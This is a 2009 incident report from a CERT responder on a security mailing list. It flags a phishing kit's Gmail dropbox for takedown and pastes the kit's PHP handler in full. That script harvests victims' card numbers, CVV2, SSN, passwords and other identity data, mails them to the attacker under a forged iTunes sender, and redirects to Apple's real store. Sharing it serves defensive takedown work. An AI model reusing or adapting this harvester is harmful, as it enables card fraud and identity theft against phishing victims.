[nsp-sec] Phishing dropbox @gmail.com

Torsten Voss voss at dfn-cert.de
Fri Jun 19 06:33:51 EDT 2009 

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hello,

we've found a phishing website with the dropbox at:

spam.mails.new at gmail.com

Please kill the address.

Regards,
Torsten, AS680


<?

$ip = getenv("REMOTE_ADDR");
$message .= "----------------------------------------------------------\n";
$message .= "FirstName                   : ".$_POST['5']."\n";
$message .= "Last name                  : ".$_POST['6']."\n";
$message .= "Address                     : ".$_POST['7']."\n";
$message .= "City                          : ".$_POST['8']."\n";
$message .= "State                        : ".$_POST['9']."\n";
$message .= "Zipcode                     : ".$_POST['24']."\n";
$message .= "Country                     : ".$_POST['11']."\n";
$message .= "Extension                   : ".$_POST['12']."\n";
$message .= "PhoneNumber              : ".$_POST['12']."\n";
$message .= "PhoneNumber2            : ".$_POST['13']."\n";;
$message .= "Card number               : ".$_POST['2']."\n";
$message .= "Expiry month               : ".$_POST['3']."\n";
$message .= "Expiry year                 : ".$_POST['23']."\n";
$message .= "CVV2                         : ".$_POST['22']."\n";
$message .= "Mother's maiden name   : ".$_POST['19']."\n";
$message .= "SSN                           : ".$_POST['15']."\n";
$message .= "Birth month                 : ".$_POST['16']."\n";
$message .= "Birth day                    : ".$_POST['17']."\n";
$message .= "Birth year                   : ".$_POST['18']."\n";
$message .= "Email address              : ".$_POST['25']."\n";
$message .= "Password                   : ".$_POST['26']."\n";

$message .= "--------------Madded by Eminem Naija-----------------------\n";
$send = "spam.mails.new at gmail.com";
$subject = "Ehijie u happy? : ".$_POST['2']."\n ";
$headers = "From: iTunes<mail at satc.net>";
$headers .= $_POST['eMailAdd']."\n";
$headers .= "MIME-Version: 1.0\n";
$arr=array($send, $IP);
foreach ($arr as $send)
{
mail($send,$subject,$message,$headers);
mail($to,$subject,$message,$headers);
}
header("Location:
http://store.apple.com/1-800-MY-APPLE/WebObjects/AppleStore.woa/9314002/wo/lC25o8vmswyX2eduNQ3Q6b9hf7m/2.0.26.9.5.7.1");


$domain = $_SERVER['HTTP_HOST'];

?>


- --
Dipl.-Ing.(FH) Torsten Voss (Incident Response Team), Phone +49 40 808077-634

DFN-CERT Services GmbH, https://www.dfn-cert.de, Phone  +49 40 808077-555
Sitz / Register: Hamburg, AG Hamburg, HRB 88805, Ust-IdNr.:  DE 232129737
Sachsenstrasse 5, 20097 Hamburg/Germany, CEO: Dr. Klaus-Peter Kossakowski

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.4-svn0 (GNU/Linux)
Comment: Using GnuPG with SUSE - http://enigmail.mozdev.org

iQEVAwUBSjtpjyXNv0Upg26pAQJuLAf/aoGh0/OThRvi9oc8QmH9LuZFljH3opjO
lfBOHF6/freP8vHUFkP4X5RT/OW7P7K2TkjngiMa4YmAYfiM+XBVzzu4Ujq/AmgD
Y039xVTncEe3+CyLzucxmCEtPFYLeoE0GoSvnJvzYHGhjL/c/Ngn+7Mp7i8GNMx1
aMZOniBpW9oipQE3fvHjJsiUKMjioaxIAsOmhnD6casIn05Ms4Ej1o062lfVA2y3
J5aFS0+On79X0TdBQklnocH7F3bsvZjsF5LLeoiG+pCfj7OWtPyFUIvx1FJplU9U
pxQy5gnT7KjAXFk3wXPcy5UFe7QqiUBsb82QIf1aYQybyxuQNnz4qg==
=vEex
-----END PGP SIGNATURE-----

More information about the nsp-security mailing list